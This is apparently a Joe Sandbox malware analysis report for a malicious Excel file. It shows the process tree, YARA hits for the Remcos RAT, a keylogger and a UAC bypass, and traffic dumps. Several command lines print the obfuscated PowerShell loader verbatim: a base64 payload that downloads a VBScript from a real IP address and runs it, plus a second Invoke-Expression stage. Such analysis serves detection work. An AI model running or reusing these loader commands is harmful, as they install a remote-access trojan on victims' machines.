2024-12-03 13:01:34 UTC | 1378 | IN | Data Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07
                                                                                                                                                                                  Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
                                                                                                                                                                                  2024-12-03 13:01:34 UTC1378INData Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7
                                                                                                                                                                                  Data Ascii: Iv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
                                                                                                                                                                                  2024-12-03 13:01:34 UTC1378INData Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a
                                                                                                                                                                                  Data Ascii: Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
                                                                                                                                                                                  2024-12-03 13:01:34 UTC1378INData Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4
                                                                                                                                                                                  Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#


Target ID: 0
Start time: 08:00:31
Start date: 03/12/2024
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase: 0x13f7f0000
File size: 28'253'536 bytes
MD5 hash: D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 4
Start time: 08:00:56
Start date: 03/12/2024
Path: C:\Windows\System32\mshta.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\mshta.exe -Embedding
Imagebase: 0x13f6d0000
File size: 13'824 bytes
MD5 hash: 95828D670CFD3B16EE188168E083C3C5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 08:01:01
Start date: 03/12/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))"
Imagebase: 0x4a470000
File size: 345'088 bytes
MD5 hash: 5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 08:01:02
Start date: 03/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
                                                                                                                                                                                  Commandline:POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'JG0yICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZGQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRlRmlOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdqaE1tTXZxR0tHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbGhTSyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENRQkFlWlQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSUNFY1JkZUlVeCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB6eHh6cG1JKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlp4ek5LWW9HSndQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3F6R2pUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbTI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDIuOTMuNjUuMTYxLzY4MC93ZW5lZWRraXNzaW5nd2VsbG9uZ2lybGZyaWVuZHNoZWJlYXV0aWZ1bGdpcmwudElGIiwiJGVOVjpBUFBEQVRBXHdlbmVlZGtpc3Npbmd3ZWxsb25naXJsZnJpZW5kc2hlYmVhdXRpZi52YlMiLDAsMCk7U3RBUnQtU0xFRXAoMyk7aWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcd2VuZWVka2lzc2luZ3dlbGxvbmdpcmxmcmllbmRzaGViZWF1dGlmLnZiUyI='+[ChaR]34+'))')))"
Imagebase: 0x13f3f0000
File size: 443'392 bytes
MD5 hash: A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 8
Start time: 08:01:08
Start date: 03/12/2024
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sietgs52\sietgs52.cmdline"
Imagebase: 0x13fa00000
File size: 2'758'280 bytes
MD5 hash: 23EE3D381CFE3B9F6229483E2CE2F9E1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 9
Start time: 08:01:09
Start date: 03/12/2024
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBA2.tmp" "c:\Users\user\AppData\Local\Temp\sietgs52\CSC6D12096A8D2545939E28F0D748EE93EA.TMP"
Imagebase: 0x13f6b0000
File size: 52'744 bytes
MD5 hash: C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 08:01:14
Start date: 03/12/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS"
Imagebase: 0xff7a0000
File size: 168'960 bytes
MD5 hash: 045451FA238A75305CC26AC982472367
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 12
Start time: 08:01:15
Start date: 03/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = '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';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente
Imagebase: 0x13f3f0000
File size: 443'392 bytes
MD5 hash: A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                  Start time:08:01:16
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                                                                                                  Imagebase:0x13fa60000
                                                                                                                                                                                  File size:13'824 bytes
                                                                                                                                                                                  MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                  Start time:08:01:22
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Windows\system32\cmd.exe" "/C POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))"
                                                                                                                                                                                  Imagebase:0x4a910000
                                                                                                                                                                                  File size:345'088 bytes
                                                                                                                                                                                  MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                  Start time:08:01:22
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:POwerSHEll.EXe -EX BypasS -NOp -w 1 -c DEViCecredEnTiAldEPloyMEnT ; INVokE-EXpreSsIOn($(INvoke-exPressIOn('[SYStEM.tEXT.eNCoDINg]'+[CHAr]0X3A+[ChAr]0x3a+'UtF8.GeTSTRing([SYsteM.CONveRT]'+[CHaR]0X3A+[cHar]58+'FrOmbaSe64sTrIng('+[cHar]34+'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'+[ChaR]34+'))')))"
                                                                                                                                                                                  Imagebase:0x13f3f0000
                                                                                                                                                                                  File size:443'392 bytes
                                                                                                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                  Start time:08:01:23
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tc3erle0\tc3erle0.cmdline"
                                                                                                                                                                                  Imagebase:0x13f220000
                                                                                                                                                                                  File size:2'758'280 bytes
                                                                                                                                                                                  MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                  Start time:08:01:23
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF4EA.tmp" "c:\Users\user\AppData\Local\Temp\tc3erle0\CSCE42B52D3958749FFBAC69A71E4122F1.TMP"
                                                                                                                                                                                  Imagebase:0x13f8f0000
                                                                                                                                                                                  File size:52'744 bytes
                                                                                                                                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                  Start time:08:01:28
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weneedkissingwellongirlfriendshebeautif.vbS"
                                                                                                                                                                                  Imagebase:0xffec0000
                                                                                                                                                                                  File size:168'960 bytes
                                                                                                                                                                                  MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                  Start time:08:01:30
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $biscato = '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';$desalinhadamente = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($biscato));Invoke-Expression $desalinhadamente
                                                                                                                                                                                  Imagebase:0x13f3f0000
                                                                                                                                                                                  File size:443'392 bytes
                                                                                                                                                                                  MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                  Start time:08:01:40
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                                                                                                                                                  Imagebase:0xc40000
                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                  Start time:08:01:47
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\tozq"
                                                                                                                                                                                  Imagebase:0xc40000
                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                  Start time:08:01:47
                                                                                                                                                                                  Start date:03/12/2024
                                                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\wieivps"
                                                                                                                                                                                  Imagebase:0xc40000
                                                                                                                                                                                  File size:107'704 bytes
                                                                                                                                                                                  MD5 hash:8AD6D0D81FEC2856B8DCABEE8D678F61
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:31
Start time: 08:01:48
Start date: 03/12/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\gcjtvhddyq"
Imagebase: 0xc40000
File size: 107'704 bytes
MD5 hash: 8AD6D0D81FEC2856B8DCABEE8D678F61
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 32
Start time: 08:01:54
Start date: 03/12/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Imagebase: 0xc40000
File size: 107'704 bytes
MD5 hash: 8AD6D0D81FEC2856B8DCABEE8D678F61
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000020.00000002.555858192.0000000000585000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000020.00000002.555239119.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Has exited: true

Module: Sheet1

Declaration
Line  Content
1     Attribute VB_Name = "Sheet1"
2     Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3     Attribute VB_GlobalNameSpace = False
4     Attribute VB_Creatable = False
5     Attribute VB_PredeclaredId = True
6     Attribute VB_Exposed = True
7     Attribute VB_TemplateDerived = False
8     Attribute VB_Customizable = True
9     Attribute VB_Name = "Sheet1"
10    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
11    Attribute VB_GlobalNameSpace = False
12    Attribute VB_Creatable = False
13    Attribute VB_PredeclaredId = True
14    Attribute VB_Exposed = True
15    Attribute VB_TemplateDerived = False
16    Attribute VB_Customizable = True

Module: Sheet2

Declaration
Line  Content
1     Attribute VB_Name = "Sheet2"
2     Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3     Attribute VB_GlobalNameSpace = False
4     Attribute VB_Creatable = False
5     Attribute VB_PredeclaredId = True
6     Attribute VB_Exposed = True
7     Attribute VB_TemplateDerived = False
8     Attribute VB_Customizable = True
9     Attribute VB_Name = "Sheet2"
10    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
11    Attribute VB_GlobalNameSpace = False
12    Attribute VB_Creatable = False
13    Attribute VB_PredeclaredId = True
14    Attribute VB_Exposed = True
15    Attribute VB_TemplateDerived = False
16    Attribute VB_Customizable = True

Module: ThisWorkbook

Declaration
Line  Content
1     Attribute VB_Name = "ThisWorkbook"
2     Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3     Attribute VB_GlobalNameSpace = False
4     Attribute VB_Creatable = False
5     Attribute VB_PredeclaredId = True
6     Attribute VB_Exposed = True
7     Attribute VB_TemplateDerived = False
8     Attribute VB_Customizable = True
9     Attribute VB_Name = "ThisWorkbook"
10    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
11    Attribute VB_GlobalNameSpace = False
12    Attribute VB_Creatable = False
13    Attribute VB_PredeclaredId = True
14    Attribute VB_Exposed = True
15    Attribute VB_TemplateDerived = False
16    Attribute VB_Customizable = True

Memory Dump Source
• Source File: 00000004.00000003.442738173.0000000003130000.00000010.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_3_3130000_mshta.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
• Instruction ID: 70abbb2690a8420366a7860d47bc8a8fbdcc370cbd3d813c82b20e7fe383b468
• Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
• Instruction Fuzzy Hash:

Execution Graph

Execution Coverage: 3.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 4
Total number of Limit Nodes: 0
execution_graph 3817 7fe899c7c25 3819 7fe899c7c33 3817->3819 3818 7fe899c7c00 3819->3818 3820 7fe899c7be3 URLDownloadToFileW 3819->3820 3820->3818

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000007.00000002.475177430.000007FE899C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7fe899c0000_powershell.jbxd
Similarity
• API ID: DownloadFile
• String ID:
• API String ID: 1407266417-0
• Opcode ID: 9948bc6d770e860b75fa454e1b26024c9bb87e678cf14dd0d4350483a9068b22
• Instruction ID: dd9d2aec8907b5c0eb7b7e7fbd4249ce01c59a8a7d2b2634bc6a0a032837168b
• Opcode Fuzzy Hash: 9948bc6d770e860b75fa454e1b26024c9bb87e678cf14dd0d4350483a9068b22
• Instruction Fuzzy Hash: 14319F31918A5C9FDB58EF5CD885BA9B7E1FB59725F00822ED04DD3661CB70B8068B81

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000007.00000002.475177430.000007FE899C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7fe899c0000_powershell.jbxd
Similarity
• API ID: DownloadFile
• String ID:
• API String ID: 1407266417-0
• Opcode ID: 3564d2ac142c4a064d696a39380aff265b310662ce154e6a372ec1fea6ce31e1
• Instruction ID: 641bd9236fe160d63ae29a915ee22288c1fc05c9ce19101104c63db51e3d72cf
• Opcode Fuzzy Hash: 3564d2ac142c4a064d696a39380aff265b310662ce154e6a372ec1fea6ce31e1
• Instruction Fuzzy Hash: 6041E67181CB889FD719DB589C447AABBF4FB56325F04426FD08DD35A2CB646806C781

Control-flow Graph

Memory Dump Source
• Source File: 00000007.00000002.475177430.000007FE899C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7fe899c0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5ae42f63c2c43ec436d9fab267423d4fba3339404ee99d48afa5b0ecd76930c9
• Instruction ID: c5b60c5345318ebf1949d6af1576c78d9518ea2194306bca779a10ce0cb9eaec
• Opcode Fuzzy Hash: 5ae42f63c2c43ec436d9fab267423d4fba3339404ee99d48afa5b0ecd76930c9
• Instruction Fuzzy Hash: 7A11633190D3C14FD30B9B68AC516987FB0EF43269F0941EBC099C75E3C619645AC766

Control-flow Graph

